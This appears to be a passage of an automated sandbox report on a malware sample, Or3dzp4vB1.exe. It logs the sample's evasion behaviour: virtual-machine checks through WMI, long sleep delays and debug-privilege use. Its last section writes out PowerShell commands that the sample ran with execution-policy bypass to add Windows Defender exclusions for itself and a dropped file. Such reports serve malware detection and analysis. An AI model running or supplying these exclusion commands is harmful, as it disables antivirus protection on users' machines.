Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Memory allocated: 12D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Memory allocated: 1ACC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\0720XW Memory allocated: 2590000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\0720XW Memory allocated: 1A870000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\0720XW Memory allocated: F10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\0720XW Memory allocated: 1AA70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\0720XW Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\0720XW Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Window / User API: threadDelayed 9112 Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Window / User API: threadDelayed 733 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4855 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4998 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7595 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2066 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8347 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1147 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7799
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1864
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe TID: 1180 Thread sleep time: -25825441703193356s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080 Thread sleep count: 7595 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080 Thread sleep count: 2066 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6496 Thread sleep count: 8347 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6376 Thread sleep count: 1147 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4532 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3232 Thread sleep count: 7799 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3232 Thread sleep count: 1864 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Roaming\0720XW TID: 2196 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8076 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\0720XW TID: 6792 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\0720XW File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\0720XW File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\0720XW Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\0720XW Thread delayed: delay time: 922337203685477
Source: svchost.exe, 0000001A.00000002.2484722276.000001C43905E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2482179836.000001C437C2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Or3dzp4vB1.exe, 00000000.00000002.2518894545.000000001BBA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\0720XW Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\0720XW Process token adjusted: Debug
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe'
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\0720XW'
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe' Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\0720XW' Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe'
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe' Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Or3dzp4vB1.exe' Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\0720XW' Jump to behavior
